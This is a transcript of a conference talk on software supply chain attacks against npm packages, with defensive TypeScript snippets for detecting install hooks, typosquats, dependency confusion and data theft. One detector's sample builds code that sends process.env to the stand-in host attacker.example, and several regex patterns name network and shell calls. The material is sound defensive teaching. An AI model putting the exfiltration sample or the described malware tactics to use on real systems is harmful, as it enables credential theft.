How to Secure Your Software Supply Chain – Practical Lessons To Protect Your App

Talk

Continuous Delivery
UXDX APAC 2022

Open source code makes up 90% of most codebases. How do you know if you can trust your open source dependencies? It is critical to manage your dependencies effectively to reduce risk, but most teams have an ad-hoc process where any developer can introduce dependencies, leaving organizations open to risk from malicious dependencies. Software supply chain attacks have exploded over the past 12 months, and they're only accelerating in 2022 and beyond. We'll dive into examples of recent supply chain attacks and the concrete steps you can take to protect your team from this emerging threat.

Hello, and welcome to my talk on how to secure your software supply chain, with practical lessons to protect your app. My name is Feross. I'm the founder and CEO of Socket, an open source supply chain security company. I'm also an instructor at Stanford University, where I teach the web security course, and the creator of hundreds of open source projects, which are downloaded 500 million times per month, including StandardJS, a popular community JavaScript style guide, and WebTorrent, the first browser BitTorrent client. In the past, I was a board member of the Node.js Foundation, as well as a consultant for the Silicon Valley TV show, which was a pretty fun job.

A little bit about my company, Socket. Socket is a cybersecurity platform that protects companies from software supply chain attacks. We audit every open source package to detect supply chain attacks, such as malware, typosquats, hidden code, and misleading packages, and we block them in real time. Customers include thousands of top tech organisations.

Now let's get started. Let me tell you a story. On January 13, 2012, over 10 years ago, a developer named Faisal Salman published a new project on GitHub. It was called ua-parser-js, a user agent string parser. Lots of people found it useful. Over the next 10 years, Faisal continued to develop the package with help from many open source contributors, publishing 54 versions, and the package kept growing in popularity. Eventually, it reached 7 million downloads per week, and it was used by over 3 million GitHub repositories.

Here's how the story continues. On October 5, 2021, this post appeared on a notorious Russian hacking forum. A hacker was selling the password to an npm account that controlled a package with over 7 million weekly downloads. In case you didn't make the connection, that's the same package as before. Two weeks later, ua-parser-js was compromised.
Three malicious versions of the package were published, with malware added that would execute immediately whenever anyone installed one of them. Let's jump into that malware and take a peek at what it did. This is the package.json file for the package. I'll draw your attention to the new version number here, as well as the preinstall script on this line. That script simply runs a file called preinstall.js, which is where the malware lives. If you open up that file, here's what it looks like. The first thing you'll notice is that different code runs on each platform: Mac, Windows, and Linux have different code paths. Mac users are lucky; nothing actually happens on that platform. On Windows, a file called preinstall.bat is executed, and on Linux, a similar file, preinstall.sh, is executed.

So let's open up those files and dig in. The first thing you'll notice is that the user's country is looked up based on their IP address. If they're in Russia, Ukraine, Belarus, or Kazakhstan, the program just exits and nothing happens. This is actually pretty common in malware. It's done presumably because the attacker lives in one of these countries and is trying not to antagonise their local law enforcement.
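The red flag in that package.json, a new release that suddenly gains a preinstall script, can be checked mechanically whenever a dependency is bumped. Below is a minimal TypeScript sketch, assuming the old and new manifests are already parsed into objects; `Manifest` and `diffInstallHooks` are hypothetical names for illustration, not part of npm or any tool from the talk. It relies on npm running the `preinstall`, `install`, and `postinstall` scripts automatically during installation.

```typescript
// npm runs these lifecycle scripts automatically when a package is installed.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"] as const;

// Hypothetical shape of a parsed package.json (only the fields this sketch needs).
interface Manifest {
  name: string;
  version: string;
  scripts?: Record<string, string>;
}

// Report install-time hooks that are new or changed in `next` compared with `prev`.
function diffInstallHooks(prev: Manifest, next: Manifest): string[] {
  const findings: string[] = [];
  for (const hook of INSTALL_HOOKS) {
    const before = prev.scripts?.[hook];
    const after = next.scripts?.[hook];
    if (after === undefined || after === before) continue; // absent or unchanged
    const where = `${next.name}@${next.version}`;
    findings.push(
      before === undefined
        ? `${where}: new "${hook}" script: ${after}`
        : `${where}: changed "${hook}" script: ${before} -> ${after}`
    );
  }
  return findings;
}

// Example with hypothetical manifests: the new release adds a preinstall hook.
console.log(
  diffInstallHooks(
    { name: "example-parser", version: "1.0.0", scripts: { test: "jest" } },
    { name: "example-parser", version: "1.0.1", scripts: { test: "jest", preinstall: "node preinstall.js" } }
  )
);
```

A finding here is not proof of malice, since some packages legitimately add install scripts, but it is exactly the kind of change worth a human look before merging the bump.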

If you're not in one of these countries, the malware continues. You'll see here that it uses pgrep to check whether the miner is already running. If it is, the script ends. Otherwise, it downloads the malware, prepares it for execution, and executes it. If you look at the arguments here, you'll notice this is actually a cryptocurrency miner, specifically a Monero miner. It's going to use up the resources of whatever machine is unlucky enough to install this package, whether that's your personal laptop, your build server, or even your production server. On Windows, the malware follows a very similar process of downloading the miner, but it also downloads an additional file here, this DLL file. After starting the miner, it registers that DLL, which turns out to be pretty nefarious: it steals passwords from 100 different programs on the machine, as well as anything in the Windows Credential Manager, which includes the user's saved passwords.

This is obviously not something you want running on your machine. In the aftermath, the maintainer apologised and contacted npm support to get the malicious versions taken down. They were available for a total of four hours, and anyone who installed the package during that window was compromised. That means any software builds run during that window were compromised, and anyone who updated to one of these versions, or merged a pull request that did, would have been compromised. This was big news in the JavaScript world; you might have heard about it back in October. A lot of libraries used by big companies, including ones created by companies like Facebook, were affected because they depended on ua-parser-js.

But this one incident was just the tip of the iceberg. It drew a lot of attention to the issue in October, but there have been many incidents since. There was another similar incident involving a cryptocurrency miner. In January, there was an incident with a maintainer sabotaging his own packages. And in March and April, there were incidents of protestware, which is basically people sabotaging packages to make political statements.

We've seen 150 different packages removed for security reasons in just the last 30 days alone. So this trend seems to be accelerating, and attackers are taking advantage of the trust in the open source ecosystem. One question you might ask is: why is this happening now? I think it comes down to four reasons.

The first reason is that 90% of an app's code comes from open source. Open source has won. It has enabled teams to build powerful applications in days or weeks instead of months or years. Open source works because anyone can inspect the code, anyone can contribute, and anyone can publish a package. Open source communities are trusting by default: good contributors are rewarded with recognition and, eventually, publish rights. This is also why your node_modules folder is often one of the heaviest objects in the universe.

The second reason is that we have lots of transitive dependencies. The way we write software has changed in the last decade. We use dependencies much more liberally, and that leads to thousands of dependencies in most projects. Take Discord, a popular chat application, as an example. Discord is an Electron app, and it's built on a massive amount of open source: as you can see here, around 19,000 total packages, with code contributions from 300,000 different contributors in 206 different countries. That's a mind-boggling amount of open source in a single app. This is amplified by the way packages are written today. A 2019 paper found that installing an average npm package introduces implicit trust in 79 third-party packages and 39 maintainers, creating a surprisingly large attack surface. At Socket, we made this visualisation to give you a sense of what a dependency actually looks like. This is webpack, a very common dependency; it's probably building your front end right now if you have one. Every grey box is a package, and every purple box is a file within a package. As we peel back the layers, opening up each grey box, you see the files inside as well as the nested packages. As you can see, there's a lot of code and a lot of different packages that make up webpack.
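To see how a handful of direct dependencies turns into a much larger set of trusted packages, here is a minimal TypeScript sketch that walks a dependency graph breadth-first and collects everything reachable from one package. The graph shape and package names are hypothetical; real lockfiles key packages by name and version, so treat this as a simplification.

```typescript
// Simplified dependency graph: package name -> names of its direct dependencies.
type DepGraph = Record<string, string[]>;

// Breadth-first walk from `root`, returning every package reachable from it.
// The `seen` set makes shared and cyclic dependencies count only once.
function transitiveDeps(graph: DepGraph, root: string): Set<string> {
  const seen = new Set<string>();
  const queue: string[] = [...(graph[root] ?? [])];
  while (queue.length > 0) {
    const pkg = queue.shift()!;
    if (pkg === root || seen.has(pkg)) continue;
    seen.add(pkg);
    for (const dep of graph[pkg] ?? []) {
      if (!seen.has(dep)) queue.push(dep);
    }
  }
  return seen;
}

// Hypothetical graph: the app declares 2 dependencies but ends up trusting 5 packages.
const exampleGraph: DepGraph = {
  app: ["a", "b"],
  a: ["c"],
  b: ["c", "d"],
  c: [],
  d: ["e"],
  e: ["a"], // cycles can occur in real graphs
};
console.log(transitiveDeps(exampleGraph, "app").size); // 5
```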

The third reason is that no one reads the code today. What we're doing is kind of crazy: we download code from the internet, written by unknown individuals, that we haven't read, and we execute it with full permissions on the laptops and servers where we keep our most important data. When you think of it like that, it's a miracle that this system works at all, and that it's continued to work for so long.

Part of the reason people don't read the code is that npm doesn't make it easy. If you open up the website and go to this Explore tab here, you can't even see the code you're going to download when you select a package. So developers have a hard time making good decisions and actually reading the code.

They often resort to clicking the GitHub link and reading the code on GitHub. But attackers can publish different code to npm and GitHub. Often, the code on npm differs from the code in the associated GitHub repository, and attackers know this and take advantage of it. In fact, npm does not guarantee that the code on GitHub matches the code on npm. So no one is looking at the code. You might think that's okay. There's a famous line, often attributed to Linus Torvalds: given enough eyeballs, all bugs are shallow. To some extent, that's true. But if everyone is relying on someone else to read the code, then who is finding the malware? This may be why, on average, a malicious package is available for 209 days before it's publicly reported, according to a 2020 research paper. I personally find this number very shocking. Another paper, from 2021, found similar results, including that 20% of malware persists in package managers for over 400 days and gets more than 1,000 downloads.

Finally, the fourth reason this is happening now is that popular tools give a false sense of security. It's very common to use vulnerability scanning tools to tell you whether open source is safe or not. But scanning for known vulnerabilities is not enough. The entire security industry is obsessed with scanning for known vulnerabilities, an approach that is too reactive to stop an active supply chain attack.

Vulnerabilities can take weeks or months to be discovered. In today's culture of fast development, a malicious dependency can be updated, merged, and running in production within days or even hours. That isn't enough time for a vulnerability report to be created and make its way into the scanning tools that many teams use. What it comes down to is that supply chain attacks and vulnerabilities are very different, and they need different solutions. Vulnerabilities are accidentally introduced by open source maintainers, and it's sometimes okay to ship them to production if they're low impact. Supply chain attacks, on the other hand, are intentionally introduced by an attacker, and it's never okay to ship such code to production. It's never okay to ship malware to production. You must catch it before you install it or depend on it in your application. Vulnerability scanners will not catch the next supply chain attack. Now that we understand why supply chain attacks are happening now, let's dig into how a supply chain attack actually works.
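The distinction above, where a low-impact vulnerability may sometimes ship but malware never may, can be written down as a merge gate. This is a minimal TypeScript sketch under stated assumptions: the `Alert` shape, the severity names, and the default threshold are hypothetical choices for illustration, not the output format of any particular scanner.

```typescript
type Severity = "low" | "moderate" | "high" | "critical";

// Hypothetical alert shape produced by whatever scanners a team runs.
type Alert =
  | { kind: "malware"; pkg: string }
  | { kind: "vulnerability"; pkg: string; severity: Severity };

const SEVERITY_RANK: Record<Severity, number> = { low: 0, moderate: 1, high: 2, critical: 3 };

// Malware always blocks the merge; a known vulnerability blocks only at or
// above the team's chosen threshold (the "high" default is an assumption).
function shouldBlockMerge(alerts: Alert[], vulnThreshold: Severity = "high"): boolean {
  return alerts.some((a) =>
    a.kind === "malware" ? true : SEVERITY_RANK[a.severity] >= SEVERITY_RANK[vulnThreshold]
  );
}

console.log(shouldBlockMerge([{ kind: "vulnerability", pkg: "lib-a", severity: "low" }])); // false
console.log(shouldBlockMerge([{ kind: "malware", pkg: "lib-b" }])); // true
```

The asymmetry is the point: there is no threshold setting under which a malware alert lets the merge through.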
There are two things I want to talk about: attack vectors and attack tactics. Vectors are how the attacker tricks you, and tactics are what the code actually does when it runs. Let's start with attack vectors. The first and most common attack vector is hijacked packages. These are the source of a lot of the headlines you see in the news about compromised open source packages, and it's what happened in the example we started this talk with, ua-parser-js. Packages get hijacked for a number of reasons. The maintainer might choose a weak password, which is what happened in the case of ua-parser-js. The maintainer might give access to a malicious actor by mistake.

Maintainers can become malicious themselves; that actually happened in January. Maintainers can also use their packages to protest. And maintainers can simply get malware on their laptops. All of this is exacerbated by the fact that npm doesn't enforce 2FA, though this has started to improve recently. The next attack vector is typosquatting, which is a pretty nefarious trick. If you look at these two packages here, one of them is real and one of them is fake, and you might be hard-pressed to guess which is which. I'll just tell you: the first one is real, and the second one is fake. If you made the mistake of installing the fake package, you would be greeted with a nice supply chain attack.
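Spotting a typosquat by eye is hard, but a rough automated check is easy: compare a candidate name against a list of popular package names and flag near matches. This minimal TypeScript sketch uses Levenshtein edit distance; the distance threshold and the package list are assumptions, and short names will produce false positives, so treat a match as a prompt to double-check rather than a verdict.

```typescript
// Levenshtein edit distance: the minimum number of single-character
// insertions, deletions, or substitutions that turn `a` into `b`.
function editDistance(a: string, b: string): number {
  // row[j] holds the distance between the first i chars of a and the first j chars of b.
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0]; // distance for (i - 1, j - 1)
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j]; // distance for (i - 1, j)
      row[j] = Math.min(
        above + 1, // delete a[i - 1]
        row[j - 1] + 1, // insert b[j - 1]
        diag + (a[i - 1] === b[j - 1] ? 0 : 1) // substitute (or keep) a character
      );
      diag = above;
    }
  }
  return row[b.length];
}

// Popular names the candidate is suspiciously close to, but not equal to.
function possibleTyposquatTargets(candidate: string, popular: string[], maxDistance = 2): string[] {
  return popular.filter((p) => p !== candidate && editDistance(candidate, p) <= maxDistance);
}

console.log(editDistance("kitten", "sitting")); // 3
console.log(possibleTyposquatTargets("expresss", ["express", "react", "lodash"])); // [ 'express' ]
```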

Here are the contents of the fake package. As you'll note, this line says that a script is going to run automatically. If we open up that file to see what's inside, we're greeted with a completely obfuscated file. Even without being able to decipher what this code does, it's clear this is not something you should be running on your machine or in production. It's not going to do anything you want it to do. Let's talk about the next attack vector: dependency confusion.

Dependency confusion is closely related to typosquatting, but instead of relying on the user making a mistake about which dependency they install, this attack works when a company publishes packages to its own internal, private npm registry using names that haven't been registered on the public registry. An attacker can come along and register a package with the same name on the public registry, and later, some internal tools may get confused and use the public version of the package instead of the internal one. That's why it's called a dependency confusion attack. There have been plenty of examples of this recently, and many companies were affected. Just looking through the recently deleted npm packages, we found a bunch of likely dependency confusion attacks, and most of them had malicious code in them.
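A common defence is to publish internal packages under an organisation scope that you also own on the public registry, and to route that scope to your private registry with a line of the form `@acme:registry=<your registry URL>` in `.npmrc`. The minimal TypeScript sketch below audits internal package names against that rule. The `@acme` scope, the package names, and the `publicNames` set (standing in for real registry lookups) are all hypothetical.

```typescript
// Result of auditing internal package names for dependency-confusion exposure.
interface ConfusionReport {
  scoped: string[]; // under the organisation scope, resolved via the private registry
  takenPublicly: string[]; // unscoped and already registered publicly: investigate now
  unclaimed: string[]; // unscoped and free: an attacker could register it
}

// `publicNames` stands in for lookups against the public registry (an assumption;
// a real audit would query the registry for each name).
function auditInternalNames(internal: string[], orgScope: string, publicNames: Set<string>): ConfusionReport {
  const report: ConfusionReport = { scoped: [], takenPublicly: [], unclaimed: [] };
  for (const pkg of internal) {
    if (pkg.startsWith(`${orgScope}/`)) report.scoped.push(pkg);
    else if (publicNames.has(pkg)) report.takenPublicly.push(pkg);
    else report.unclaimed.push(pkg);
  }
  return report;
}

// Hypothetical names for a company using the @acme scope.
console.log(auditInternalNames(["@acme/ui", "acme-auth", "acme-billing"], "@acme", new Set(["acme-auth"])));
```

Names in `takenPublicly` deserve immediate attention, since some tool may already be resolving them from the public registry; names in `unclaimed` are candidates to move under the scope.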

All of those deleted packages have names that appear to conflict with likely internal package names. You can see here that all kinds of organisations were affected, including really large companies and the federal government, and there are even more on this page. So this is quite a widespread problem. It also doesn't help that npm recently had an incident in which it leaked some of these private package names. That made the attacker's job even easier, because they could just pull a list.

Alright, now let's talk about tactics. Once the attack code is running on your machine, what does it actually do? The most common tactic by far is the install script. Most malware lives in an install script, because if you're an attacker, of course you want your code to run automatically the moment the user installs the package. In 2022, a paper found that almost 94% of malicious packages had at least one install script. Unfortunately, install scripts have legitimate uses.
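Because install scripts have legitimate uses, npm's `--ignore-scripts` option is a blunt tool. One middle ground is an allowlist: know exactly which installed packages run code at install time, and review any that aren't approved. A minimal TypeScript sketch, assuming the installed manifests are already parsed; the `InstalledPackage` shape and the package names are hypothetical.

```typescript
// Hypothetical shape of an installed package's manifest.
interface InstalledPackage {
  name: string;
  version: string;
  scripts?: Record<string, string>;
}

// Lifecycle scripts npm runs automatically during installation. (npm also runs
// node-gyp for packages with a binding.gyp and no install script; not covered here.)
const AUTO_RUN_HOOKS = ["preinstall", "install", "postinstall"];

// Packages that would run code at install time but are not on the team's allowlist.
function unapprovedInstallScripts(installed: InstalledPackage[], allowlist: Set<string>): string[] {
  return installed
    .filter((p) => AUTO_RUN_HOOKS.some((hook) => p.scripts?.[hook] !== undefined))
    .filter((p) => !allowlist.has(p.name))
    .map((p) => `${p.name}@${p.version}`);
}

console.log(
  unapprovedInstallScripts(
    [
      { name: "native-addon", version: "2.1.0", scripts: { install: "node-gyp rebuild" } },
      { name: "plain-utils", version: "1.0.0" },
      { name: "sketchy-pkg", version: "0.0.3", scripts: { preinstall: "node setup.js" } },
    ],
    new Set(["native-addon"])
  )
); // [ 'sketchy-pkg@0.0.3' ]
```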

So it's not as easy as just disabling them. We've already seen many examples of this, but this single line here is enough to cause malware to execute automatically. Now, let's talk about the second tactic: stealing data. This is very common in the malware we see on npm.
If we take that last example again and dive into the scripts it's attempting to run, this is a very frequent pattern you'll see in npm malware. It's making an HTTP request, sending data from your system to this domain here. The data being sent is process.env, which holds your environment variables. That means your tokens, your keys, whatever environment variables are set, are going to get exfiltrated by this script. Attackers like to use different techniques. Sometimes an HTTP request gets blocked by a firewall, so there's also a DNS technique: the script performs a DNS lookup with the data encoded in the subdomain, which again sends the environment variables off to the attacker. The attacker can then use this data however they like. They can post it online, use it to break into your systems, or do whatever they feel like.
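The exfiltration pattern just described, reading `process.env` and sending it out over HTTP or DNS, leaves recognisable traces in source code. The minimal TypeScript sketch below reports the line numbers where each appears, so a reviewer can jump straight to them. The regular expressions are assumptions and only catch straightforward code; obfuscated or dynamically built calls will slip past them.

```typescript
// One finding per suspicious line, so a reviewer can jump straight to it.
interface Finding {
  line: number; // 1-based line number
  kind: "env-read" | "network";
  text: string;
}

// Heuristic patterns (assumptions): reads of process.env, and common outbound
// calls via http/https, fetch, or DNS lookups (the DNS exfiltration variant).
const ENV_READ = /\bprocess\.env\b/;
const NETWORK_CALL = /\b(?:https?\.(?:request|get)|fetch|dns\.(?:lookup|resolve\w*))\s*\(/;

function locateEnvAndNetwork(source: string): Finding[] {
  const findings: Finding[] = [];
  source.split("\n").forEach((raw, i) => {
    const text = raw.trim();
    if (ENV_READ.test(text)) findings.push({ line: i + 1, kind: "env-read", text });
    if (NETWORK_CALL.test(text)) findings.push({ line: i + 1, kind: "network", text });
  });
  return findings;
}

// Reading the environment and talking to the network in the same file is the
// exfiltration shape described above; it warrants a manual look, not a verdict.
function looksLikeExfiltration(findings: Finding[]): boolean {
  return findings.some((f) => f.kind === "env-read") && findings.some((f) => f.kind === "network");
}

// Hypothetical sample resembling the HTTP variant.
const sample = [
  'const https = require("https");',
  "const payload = JSON.stringify(process.env);",
  'const req = https.request({ hostname: "attacker.example", method: "POST" });',
  "req.end(payload);",
].join("\n");

const exfilFindings = locateEnvAndNetwork(sample);
console.log(exfilFindings.map((f) => `${f.line}: ${f.kind}`));
console.log(looksLikeExfiltration(exfilFindings)); // true
```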

Finally, the last tactic is to delete or ransom your data. Some examples of this are the recent protestware incidents, where we've seen peacenotwar and node-ipc. Let's take a look at that example here. This is a piece of malware written by activists who wanted to make a statement about the war in Ukraine, and they included this code in their package. If you take a close look, it's a little bit obfuscated, but the key line is down here, where it iterates through all the files on your machine and writes garbage data over them, effectively deleting all your files. Not a friendly piece of software, and not something you want running on any machine that's yours. So how can you protect your app? This is where we talk about actual solutions to these problems. The first thing you can do is choose better dependencies.

If you ship code to production, you are responsible for it. We need a mindset shift as developers. Node, the process that's running your code, doesn't care whether that code was written by you or came from open source. The mindset of "it's not my problem because it's open source" needs to change.
Ultimately, it's all going to run in the same program, and Node doesn't care who wrote the code. It's all part of your application once it's bundled up and running in production. And if you look at the licenses of the open source packages you consume, the most popular one, the MIT license, literally says the software is provided "as is", without warranty of any kind, and that in no event shall the authors be liable for any claim, damages, or other liability. That's the truth: you're ultimately responsible for the open source code that you take in and run on your production servers. So we need to do a better job of picking dependencies. How do we do this? Most of us aren't going to read the actual code.

So we look at heuristics: signals that indicate whether an open source package is high quality and trustworthy. First of all, does it get the job done? Does it have an open source license, so we can use it? Does it have good docs? Does it have a lot of downloads and GitHub stars? Does it have recent commits? Does it have types? Does it have tests? This is all good stuff to look at, but it doesn't dig deep into the package, and it won't tell you whether the package has malware in it. Most of the time, this works. But in those rare cases where a package you depend on is compromised, it might check all these boxes and still contain malware. So we need to dig a little deeper. I'm going to show you an example of a tool, the one we built at Socket, that can dig into the contents of a package and tell you what it does. There are probably other tools out there, but this is a good example of what you can do with really good static analysis.
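The surface-level checklist above can be written down so a team applies it consistently. A minimal TypeScript sketch, with hypothetical field names and placeholder thresholds; keep in mind the point made above, that a freshly hijacked release of a popular package would pass every one of these checks.

```typescript
// Hypothetical signals gathered from the registry and the repository host.
interface PackageSignals {
  license?: string;
  weeklyDownloads: number;
  daysSinceLastCommit: number;
  hasDocs: boolean;
  hasTypes: boolean;
  hasTests: boolean;
}

// The checklist as named pass/fail checks; thresholds are placeholders to tune.
function runChecklist(s: PackageSignals): Record<string, boolean> {
  return {
    license: s.license !== undefined && s.license !== "UNLICENSED",
    docs: s.hasDocs,
    popular: s.weeklyDownloads >= 10000,
    maintained: s.daysSinceLastCommit <= 365,
    types: s.hasTypes,
    tests: s.hasTests,
  };
}

// Names of the checks a package fails, to discuss during review.
function failedChecks(s: PackageSignals): string[] {
  const results = runChecklist(s);
  return Object.keys(results).filter((k) => !results[k]);
}

console.log(
  failedChecks({ license: "MIT", weeklyDownloads: 50000, daysSinceLastCommit: 30, hasDocs: true, hasTypes: true, hasTests: false })
); // [ 'tests' ]
```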

Here we have the package bufferutil. You can see that it's going to run code automatically on installation, and that it runs native code. That's called out right there on the package page. This package actually turns out to be totally benign.
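Labels like "runs code on install" and "native code" come from looking at what is inside a package. As a rough approximation, and not a description of how Socket's analysis works, this TypeScript sketch derives a few such labels from a package's files using regular expressions and file names. The input shape and label names are hypothetical. Regexes miss dynamic `require` calls and obfuscated code and can match text in comments, which is why real static analysis parses the code instead.

```typescript
// A package's files: relative path -> file contents (hypothetical input shape).
type PackageFiles = Record<string, string>;

// Matches require("x"), import ... from "x", and import("x") for the given module names,
// with or without the "node:" prefix.
function moduleRef(names: string): RegExp {
  return new RegExp(`(?:require\\(\\s*|from\\s+|import\\(\\s*)['"](?:node:)?(?:${names})['"]`);
}

const CAPABILITY_PATTERNS: Record<string, RegExp[]> = {
  network: [moduleRef("https?|net|dgram|dns"), /\bfetch\s*\(/],
  shell: [moduleRef("child_process")],
  filesystem: [moduleRef("fs|fs/promises")],
  environment: [/\bprocess\.env\b/],
};

function detectCapabilities(files: PackageFiles): Set<string> {
  const found = new Set<string>();
  const manifest = files["package.json"];
  if (manifest !== undefined) {
    const scripts: Record<string, string> = JSON.parse(manifest).scripts ?? {};
    if (["preinstall", "install", "postinstall"].some((h) => h in scripts)) found.add("install-script");
  }
  for (const path of Object.keys(files)) {
    // Compiled addons ship as .node binaries; binding.gyp describes a native build.
    if (path.endsWith(".node") || path.endsWith("binding.gyp")) found.add("native-code");
    if (!/\.[cm]?js$/.test(path)) continue; // only scan JavaScript sources
    const source = files[path];
    for (const cap of Object.keys(CAPABILITY_PATTERNS)) {
      if (CAPABILITY_PATTERNS[cap].some((re) => re.test(source))) found.add(cap);
    }
  }
  return found;
}

// Hypothetical package that builds a native addon and shells out.
console.log(
  detectCapabilities({
    "package.json": JSON.stringify({ name: "demo", scripts: { install: "node-gyp rebuild" } }),
    "binding.gyp": "{}",
    "index.js": 'const cp = require("child_process");\nmodule.exports = cp;',
  })
);
```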
But what about something sketchy, a package that's doing something kind of weird? What would that look like? Here's a package that's quite popular. It puts a little overlay on the page; it's a React-like overlay component, so it's just a web component. But if you dig into its dependencies, you'll find that it's doing quite a lot of interesting things. You'll see here that it has code that runs automatically and has telemetry, which means it's sending tracking data back to the maintainer about who installed the package. It also does a bunch of other things, like running shell commands and accessing the network. This is worth digging into further, and if you click here, you can learn more about what this package is actually doing. Now, let's take a look at an actual piece of malware. So here's a piece of malware.

If you were to look it up on Socket, you'd see that we've detected that it runs code on installation and accesses the network. If you click into the alerts, you'll jump straight to the line of code where it performs the given behaviour. You'll see here that the package accesses environment variables on this line, and here, it sends them off to some server on the internet: a typical data theft attack. So make sure to take a close look at the dependencies you use.

The next tip is to update dependencies at the right cadence. A lot of us use bots like Dependabot to stay on the latest version of our dependencies, and that's usually a good security practice. However, the quicker you update your dependencies, the fewer eyeballs have had a chance to look at the code. So there's a real trade-off here. How quickly should you update? This is a really tough question.

If you update too slowly, you're exposed to known vulnerabilities, and that's not good. If you update too quickly, you're exposed to supply chain attacks, because you're running code that nobody has looked at yet. There's no single good answer here, just trade-offs all around.
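One way to turn that trade-off into a concrete team rule is a minimum release age: adopt only versions that have been public for some number of days, so others have had a chance to spot a malicious publish, with exceptions for urgent security fixes. A minimal TypeScript sketch, assuming the release list is ordered oldest to newest by publish time; the version numbers and dates are hypothetical. npm's `--before <date>` option applies a similar date cutoff at install time.

```typescript
interface Release {
  version: string;
  publishedAt: Date;
}

const DAY_MS = 24 * 60 * 60 * 1000;

// Pick the newest release that has been public for at least `minAgeDays`.
// Assumes `releases` is ordered oldest to newest by publish time.
function pickCooledRelease(releases: Release[], now: Date, minAgeDays: number): Release | undefined {
  const cutoff = now.getTime() - minAgeDays * DAY_MS;
  let chosen: Release | undefined;
  for (const r of releases) {
    if (r.publishedAt.getTime() <= cutoff) chosen = r;
  }
  return chosen;
}

// Hypothetical release history for one dependency.
const releaseHistory: Release[] = [
  { version: "1.0.0", publishedAt: new Date("2022-01-01T00:00:00Z") },
  { version: "1.1.0", publishedAt: new Date("2022-03-01T00:00:00Z") },
  { version: "1.2.0", publishedAt: new Date("2022-03-10T00:00:00Z") },
];
console.log(pickCooledRelease(releaseHistory, new Date("2022-03-12T00:00:00Z"), 7)?.version); // 1.1.0
```

The cooldown length is the knob: longer windows buy more eyeballs at the cost of staying exposed to known vulnerabilities for longer.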
But this is something to think about as a team, and to come up with a policy for. Okay, the third thing you can do is use automation to audit every dependency.

How closely should you actually audit a dependency? Again, there's a trade-off. You can do a full audit, which means reading every single line of code of every dependency in your project. It's thorough, the best-in-class thing you can do, but it's a lot of work. It's also slow and time-consuming, and therefore expensive, because it takes a lot of time to properly audit that much code. On the other hand, a lot of teams do nothing. If you do that, you're vulnerable to supply chain attacks: you're running code you haven't audited or looked at in any way and hoping that it's good. That's risky, and it can be expensive in a different way, in terms of PR cost to the company or breaches. The happy medium is to lean on automation. What we recommend is using static analysis to audit every dependency and detect indicators of packages doing suspicious things, such as using privileged APIs like the file system or the network, or containing obfuscated code. If you detect packages doing these things, you can manually audit just those, the most suspicious packages. That way, you spend security team resources on the highest-impact tasks instead of taking an all-or-nothing approach.
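The triage step described above, automated checks on everything and human review only for the suspicious few, might look like this as a minimal TypeScript sketch. The report shape, the set of privileged capabilities, and the obfuscation thresholds are assumptions to tune, not recommendations from the talk.

```typescript
// Hypothetical per-package scan result (for example, the output of a capability scanner).
interface PackageReport {
  id: string; // name@version
  capabilities: Set<string>;
  source: string; // concatenated JavaScript source of the package
}

// Capabilities treated as privileged for triage (an assumption a team would tune).
const PRIVILEGED = ["filesystem", "network", "shell", "install-script"];

// Crude obfuscation signal: extremely long lines or many hex/unicode escapes.
function looksObfuscated(source: string): boolean {
  const longestLine = source.split("\n").reduce((max, l) => Math.max(max, l.length), 0);
  const escapes = (source.match(/\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}/g) ?? []).length;
  return longestLine > 1000 || escapes > 50;
}

// Build the manual-review queue: obfuscated packages first, then by number of
// privileged capabilities. Packages with no signals are skipped entirely.
function reviewQueue(reports: PackageReport[]): string[] {
  return reports
    .map((r) => ({
      id: r.id,
      obfuscated: looksObfuscated(r.source),
      privileged: PRIVILEGED.filter((c) => r.capabilities.has(c)).length,
    }))
    .filter((r) => r.obfuscated || r.privileged > 0)
    .sort((a, b) => Number(b.obfuscated) - Number(a.obfuscated) || b.privileged - a.privileged)
    .map((r) => r.id);
}

// Hypothetical scan results: pkg-c, then pkg-d, then pkg-b; pkg-a is skipped.
console.log(
  reviewQueue([
    { id: "pkg-a@1.0.0", capabilities: new Set<string>(), source: "module.exports = 1;" },
    { id: "pkg-b@2.0.0", capabilities: new Set<string>(["network"]), source: "/* ... */" },
    { id: "pkg-c@0.0.1", capabilities: new Set<string>(), source: "x".repeat(2000) },
    { id: "pkg-d@1.0.0", capabilities: new Set<string>(["filesystem", "shell"]), source: "/* ... */" },
  ])
);
```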

If you do this, and you put the security information directly in pull requests so that developers can see it, you empower developers to solve security issues before they're deployed to production, and you can find these attacks before they affect your users. Our final recommendation, and I know I'm biased here, is to consider using Socket to do this. You can use the tool, as we showed earlier, to research packages. It's free for the community: anyone can look up packages, and all this data is open and accessible. Feel free to use it when you're considering which packages to use or when you're auditing an application. We can also monitor pull requests for bad dependencies, which gives you an active way to catch bad dependencies before they're merged in.
This is what it looks like: it's a bot. It comes to your pull request and leaves a comment telling you what issues are present in a dependency, giving the developer the information they need to make an informed decision about it. If you're interested, you can install it for free at socket.dev. I want to end on a positive note and say: I want you for supply chain security. I think developers, security practitioners, and entire teams need to change the way they think about dependencies in order to solve the software supply chain security crisis we're in right now. We need a mindset shift around dependencies: we need to think of them as part of our apps, because they are part of our apps. And we need to understand the threats out there and the steps we can take as teams to protect ourselves from this emerging threat. With that, I'll end. Thank you for having me here; I appreciate it. My contact info is on the slide if you're interested in reaching out, and a quick shout-out: we're hiring developers at Socket. Thanks.